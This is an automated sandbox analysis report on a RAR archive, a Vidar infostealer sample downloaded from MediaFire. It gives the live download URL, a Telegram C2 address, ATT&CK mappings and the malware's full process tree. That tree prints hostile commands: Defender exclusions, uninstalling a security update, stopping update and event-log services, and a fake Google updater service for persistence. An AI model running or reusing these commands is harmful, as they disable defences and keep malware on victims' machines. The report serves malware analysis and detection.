vidar | hxxps://download2341[.]mediafire[.]com/0ew28hp7lpbgbv4QfNKRiItaiWpLBTpeUyVywzcNVQ6Asp661aZeeTk5fbs3HZ3aVXz2DigQhBG66V2XfWyQY8IGRvKXbE2of4mYro4J1qJ2WcaYol7C8t47gyYzsC8RqpmIisqfZe1Pmgnkd0JXDaenl0Q9srQCyQwbCj0P7hFGfKo/7l4wfp568n5lqkt/S0FTWARE[.]rar

Analysis

max time kernel
75s
max time network
94s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
18-09-2024 19:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://download2341.mediafire.com/0ew28hp7lpbgbv4QfNKRiItaiWpLBTpeUyVywzcNVQ6Asp661aZeeTk5fbs3HZ3aVXz2DigQhBG66V2XfWyQY8IGRvKXbE2of4mYro4J1qJ2WcaYol7C8t47gyYzsC8RqpmIisqfZe1Pmgnkd0JXDaenl0Q9srQCyQwbCj0P7hFGfKo/7l4wfp568n5lqkt/S0FTWARE.rar

Score

10^/10

vidar credential_access discovery evasion execution persistence spyware stealer upx

Malware Config

Extracted

Family

vidar

https://t.me/edm0d

https://steamcommunity.com/profiles/

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0

Signatures

Detect Vidar Stealer 20 IoCs

stealer

resource	yara_rule
behavioral1/memory/4144-441-0x0000000001200000-0x0000000001457000-memory.dmp	family_vidar_v7
behavioral1/memory/4144-443-0x0000000001200000-0x0000000001457000-memory.dmp	family_vidar_v7
behavioral1/memory/4144-455-0x0000000001200000-0x0000000001457000-memory.dmp	family_vidar_v7
behavioral1/memory/4144-456-0x0000000001200000-0x0000000001457000-memory.dmp	family_vidar_v7
behavioral1/memory/4144-471-0x0000000001200000-0x0000000001457000-memory.dmp	family_vidar_v7
behavioral1/memory/4144-472-0x0000000001200000-0x0000000001457000-memory.dmp	family_vidar_v7
behavioral1/memory/4144-487-0x0000000001200000-0x0000000001457000-memory.dmp	family_vidar_v7
behavioral1/memory/4144-488-0x0000000001200000-0x0000000001457000-memory.dmp	family_vidar_v7
behavioral1/memory/4144-492-0x0000000001200000-0x0000000001457000-memory.dmp	family_vidar_v7
behavioral1/memory/4144-493-0x0000000001200000-0x0000000001457000-memory.dmp	family_vidar_v7
behavioral1/memory/4144-518-0x0000000001200000-0x0000000001457000-memory.dmp	family_vidar_v7
behavioral1/memory/4144-519-0x0000000001200000-0x0000000001457000-memory.dmp	family_vidar_v7
behavioral1/memory/4144-526-0x0000000001200000-0x0000000001457000-memory.dmp	family_vidar_v7
behavioral1/memory/4144-527-0x0000000001200000-0x0000000001457000-memory.dmp	family_vidar_v7
behavioral1/memory/4068-547-0x00000000008C0000-0x0000000000B17000-memory.dmp	family_vidar_v7
behavioral1/memory/4068-550-0x00000000008C0000-0x0000000000B17000-memory.dmp	family_vidar_v7
behavioral1/memory/4068-574-0x00000000008C0000-0x0000000000B17000-memory.dmp	family_vidar_v7
behavioral1/memory/4068-575-0x00000000008C0000-0x0000000000B17000-memory.dmp	family_vidar_v7
behavioral1/memory/4068-590-0x00000000008C0000-0x0000000000B17000-memory.dmp	family_vidar_v7
behavioral1/memory/4068-591-0x00000000008C0000-0x0000000000B17000-memory.dmp	family_vidar_v7

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2916	powershell.exe
4012	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 2 IoCs

pid	Process
4716	S0FTWARE.exe
4588	S0FTWARE.exe

Loads dropped DLL 2 IoCs

pid	Process
4144	BitLockerToGo.exe
4144	BitLockerToGo.exe

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/868-649-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/868-651-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/868-650-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/868-657-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/868-655-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/868-654-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/868-653-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/868-652-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/868-659-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/868-660-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/868-658-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
83	bitbucket.org
84	bitbucket.org

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
540	powercfg.exe
2396	powercfg.exe
664	powercfg.exe
652	powercfg.exe
4504	powercfg.exe
4868	powercfg.exe
1420	powercfg.exe
740	powercfg.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4716 set thread context of 4144	4716	S0FTWARE.exe	116
PID 4588 set thread context of 4068	4588	S0FTWARE.exe	118

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4792	sc.exe
4676	sc.exe
2216	sc.exe
2964	sc.exe
4340	sc.exe
1952	sc.exe
1972	sc.exe
752	sc.exe
2352	sc.exe
3636	sc.exe
2680	sc.exe
2284	sc.exe
228	sc.exe
2460	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	S0FTWARE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	S0FTWARE.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	BitLockerToGo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	BitLockerToGo.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2028	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	msedge.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
4392	msedge.exe
4392	msedge.exe
1932	msedge.exe
1932	msedge.exe
2432	identity_helper.exe
2432	identity_helper.exe
4988	msedge.exe
4988	msedge.exe
4144	BitLockerToGo.exe
4144	BitLockerToGo.exe
4144	BitLockerToGo.exe
4144	BitLockerToGo.exe
4144	BitLockerToGo.exe
4144	BitLockerToGo.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeRestorePrivilege	2972	7zG.exe
Token: 35	2972	7zG.exe
Token: SeSecurityPrivilege	2972	7zG.exe
Token: SeSecurityPrivilege	2972	7zG.exe
Token: SeDebugPrivilege	4716	S0FTWARE.exe
Token: SeDebugPrivilege	4588	S0FTWARE.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe
1932	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1932 wrote to memory of 5068	1932	msedge.exe	82
PID 1932 wrote to memory of 5068	1932	msedge.exe	82
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 1508	1932	msedge.exe	83
PID 1932 wrote to memory of 4392	1932	msedge.exe	84
PID 1932 wrote to memory of 4392	1932	msedge.exe	84
PID 1932 wrote to memory of 4100	1932	msedge.exe	85
PID 1932 wrote to memory of 4100	1932	msedge.exe	85
PID 1932 wrote to memory of 4100	1932	msedge.exe	85
PID 1932 wrote to memory of 4100	1932	msedge.exe	85
PID 1932 wrote to memory of 4100	1932	msedge.exe	85
PID 1932 wrote to memory of 4100	1932	msedge.exe	85
PID 1932 wrote to memory of 4100	1932	msedge.exe	85
PID 1932 wrote to memory of 4100	1932	msedge.exe	85
PID 1932 wrote to memory of 4100	1932	msedge.exe	85
PID 1932 wrote to memory of 4100	1932	msedge.exe	85
PID 1932 wrote to memory of 4100	1932	msedge.exe	85
PID 1932 wrote to memory of 4100	1932	msedge.exe	85
PID 1932 wrote to memory of 4100	1932	msedge.exe	85
PID 1932 wrote to memory of 4100	1932	msedge.exe	85
PID 1932 wrote to memory of 4100	1932	msedge.exe	85
PID 1932 wrote to memory of 4100	1932	msedge.exe	85
PID 1932 wrote to memory of 4100	1932	msedge.exe	85
PID 1932 wrote to memory of 4100	1932	msedge.exe	85
PID 1932 wrote to memory of 4100	1932	msedge.exe	85
PID 1932 wrote to memory of 4100	1932	msedge.exe	85

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://download2341.mediafire.com/0ew28hp7lpbgbv4QfNKRiItaiWpLBTpeUyVywzcNVQ6Asp661aZeeTk5fbs3HZ3aVXz2DigQhBG66V2XfWyQY8IGRvKXbE2of4mYro4J1qJ2WcaYol7C8t47gyYzsC8RqpmIisqfZe1Pmgnkd0JXDaenl0Q9srQCyQwbCj0P7hFGfKo/7l4wfp568n5lqkt/S0FTWARE.rar
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff379446f8,0x7fff37944708,0x7fff37944718
  2⤵
  PID:5068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,10359337022502406552,17285019309914017908,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
  2⤵
  PID:1508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,10359337022502406552,17285019309914017908,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,10359337022502406552,17285019309914017908,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8
  2⤵
  PID:4100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,10359337022502406552,17285019309914017908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
  2⤵
  PID:2380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,10359337022502406552,17285019309914017908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:3608
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,10359337022502406552,17285019309914017908,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4120 /prefetch:8
  2⤵
  PID:4504
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,10359337022502406552,17285019309914017908,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4120 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2040,10359337022502406552,17285019309914017908,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5164 /prefetch:8
  2⤵
  PID:4012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,10359337022502406552,17285019309914017908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
  2⤵
  PID:5116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,10359337022502406552,17285019309914017908,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
  2⤵
  PID:3868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,10359337022502406552,17285019309914017908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
  2⤵
  PID:1964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,10359337022502406552,17285019309914017908,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
  2⤵
  PID:668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,10359337022502406552,17285019309914017908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
  2⤵
  PID:4956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2040,10359337022502406552,17285019309914017908,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5668 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4988

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5056

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5080

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4964

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\S0FTWARE\" -ad -an -ai#7zMap31501:78:7zEvent20261
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2972

C:\Users\Admin\Downloads\S0FTWARE\S0FTWARE.exe
"C:\Users\Admin\Downloads\S0FTWARE\S0FTWARE.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4716
- C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:4144
- - C:\ProgramData\EBGIDGCAFC.exe
    "C:\ProgramData\EBGIDGCAFC.exe"
    3⤵
    PID:2796
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2916
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:3004
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:3372
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:2964
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:4792
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:1972
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:752
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:4340
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:4868
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:1420
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:740
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:540
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
      4⤵
      Launches sc.exe
      PID:2284
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:228
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:2352
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
      4⤵
      Launches sc.exe
      PID:1952
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\AFCBFIJEHDHC" & exit
    3⤵
    PID:4516
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 10
      4⤵
      Delays execution with timeout.exe
      PID:2028

C:\Users\Admin\Downloads\S0FTWARE\S0FTWARE.exe
"C:\Users\Admin\Downloads\S0FTWARE\S0FTWARE.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4588
- C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
  2⤵
  PID:4068

C:\ProgramData\GoogleUP\Chrome\Updater.exe
C:\ProgramData\GoogleUP\Chrome\Updater.exe
1⤵
PID:2912
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:3444
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4212
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2460
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:3636
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4676
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2680
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2216
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2396
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:664
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:652
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:4504
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:3708
- C:\Windows\explorer.exe
  explorer.exe
